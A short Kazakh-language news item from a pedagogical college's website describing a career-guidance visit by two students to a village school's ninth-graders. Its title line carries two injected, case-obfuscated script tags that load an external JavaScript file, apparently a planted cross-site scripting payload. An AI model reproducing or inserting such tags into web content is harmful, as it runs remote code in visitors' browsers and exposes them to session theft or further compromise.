КӘСІБИ БАҒДАР БЕРУ ЖҰМЫСТАРЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

09.02.2023
Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжі «Ағылшын» бөлімінің ІV курс студенттері Батхаш Эльдар мен Қадырбек Алдияр Ақмола облысы, Біржан сал ауданы, Аңғал батыр ауылының жалпы орта білім беретін мектебінің 9-сынып оқушыларына білім ордасындағы мамандықтар мен біліктіліктер жайлы ақпарат берді. Оқушыларға колледж жайлы видеожазба көрсетіліп, таратпалы материал ұсынылды. Білім алушылар ақпарат алу мақсатында сұрақтар қойып, мамандықтарға қызығушылық білдірді.
Просмотров: 342


Пікір қосу



Деректерді қолтаңбаға қосу